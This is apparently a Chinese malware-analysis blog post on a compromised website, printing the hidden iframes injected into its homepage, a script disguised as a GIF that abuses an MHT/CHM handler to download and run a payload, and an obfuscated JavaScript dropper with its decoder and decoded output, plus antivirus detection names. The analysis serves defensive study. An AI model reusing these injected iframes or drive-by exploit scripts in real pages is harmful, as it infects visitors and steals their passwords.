[07-20] 带毒网站www.china***huati.com(第3版)

简介: [07-20] 带毒网站www.china***huati.com(第3版)

hxxp://www.china***huati.com首页被加入:  

--------------------------------

<iframe src=hxxp://bbs.**gemeus*.com/q17***/index.htm width=0 height=0></iframe>

……

<iframe height=0 width=0 src="hxxp://www.***ll-nba.com/*4***"></iframe>(endurer注:共有6处插入)

--------------------------------

hxxp://bbs.**gemeus*.com/q17***/index.htm的内容为:

--------------------------------

<script language="javascript" src="ah.js"></script>

--------------------------------

ah.js 的内容解密后的内容为:

--------------------------------

GIF89a

var GIF89a=document.location.href;GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));document.write('<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c://.mht!'+GIF89a+'/1.js::/#"></OBJECT>');

--------------------------------

冒充GIF文件,下载运行 1.js。

Kaspersky 将 1.js 报为: Packed.Win32.Klone.d( http://www.viruslist.com/en/viruses/encyclopedia?virusid=115946)。

江民KV 将 1.js 报为: Exploit.HTML.Mht.ae( http://virusinfo.jiangmin.com/infomation/200641010559.html)。

1.js 其实是个CHM文件,会释放/运行名为 msnmon.exe 的文件。

Kaspersky 将 msnmon.exe 报为: not-a-virus:AdWare.Win32.WSearch.k。

江民 对 msnmon.exe 的回复为: 不是病毒。

hxxp://www.***ll-nba.com/*4***的内容为:

------------------------
<SCRIPT LANGUAGE="JavaScript">
<!--
var HtmlStrings=["=iunm> =PCKFDU!tuzmf>#ejtqmbz;opof<#!uzqf>#ufyu0y.tdsjqumfu#!e","bub>#'$88'$86'$69'$75'$88'$94'$84'$95'$94'$227'$222'$225'$212","'$69'$21:'$215'$227'$21:'$219'$69'$::'$69'$:3'$57'$21:'$215'$","227'$44'$215'$227'$227'$223'$69'$580xxx/mm.ocb/dpn050mphp/kqh",";;0213&3F&79un#>=0PCKFDU> =0cpez> =0iunm> "];
function psw(st){
  var varS;
  varS="";
  var i;
  for(var a=0;a<st.length;a++){
    i = st.charCodeAt(a);
    if (i==1)
      varS=varS+String.fromCharCode('"'.charCodeAt()-1);
    else if (i==2) {
      a++;
      varS+=String.fromCharCode(st.charCodeAt(a));
      }
    else
      varS+=String.fromCharCode(i-1);
  }
  return varS;
};
var num=5;
function S(){
for(i=0;i<num;i++)
  document.write(psw(HtmlStrings[i]));}
S();
// -->
</SCRIPT>
-----------------------

代码运行后输出的内容为:

-----------------------
<html>
<OBJECT style="display:none;" type="text/x-scriptlet" data="MK:@MSITStore:mhtml:c:/.mht!http://www.***ll-nba.com/*4***/logo.jpg::/102%2E%68tm"></OBJECT>
</body>
</html>
-----------------------

会下载hxxp:///www.***ll-nba.com/*4***/logo.jpg。

Kaspersky 将 logo.jpg 报为:Trojan-PSW.Win32.QQShou.fw( http://www.viruslist.com/en/viruses/encyclopedia?virusid=123300)

江民KV 将 logo.jpg 报为:TrojanDropper.Mht.Psyme.gfi。


相关文章
|
4月前
|
开发者
www
自动
61 1
|
6月前
|
域名解析 开发工具 Windows
创建两个基于域名的虚拟主机1.www.aaa.com网页目录为/aaa2.www.bbb.com网页目录为/bbb
创建两个基于域名的虚拟主机1.www.aaa.com网页目录为/aaa2.www.bbb.com网页目录为/bbb
184 0
|
11月前
|
存储
WWW服务
WWW服务
487 0
|
11月前
|
数据采集 搜索推荐 BI
baby_web、Training-WWW-Robots、ics-06
baby_web、Training-WWW-Robots、ics-06
44 0
|
数据可视化 定位技术 Go
Visualize Famous Campus in China
Visualize Famous Campus in ChinaIn the end of the 9th month of 2017, many great events happened. One influential thing is the launch of the country’s .
1692 0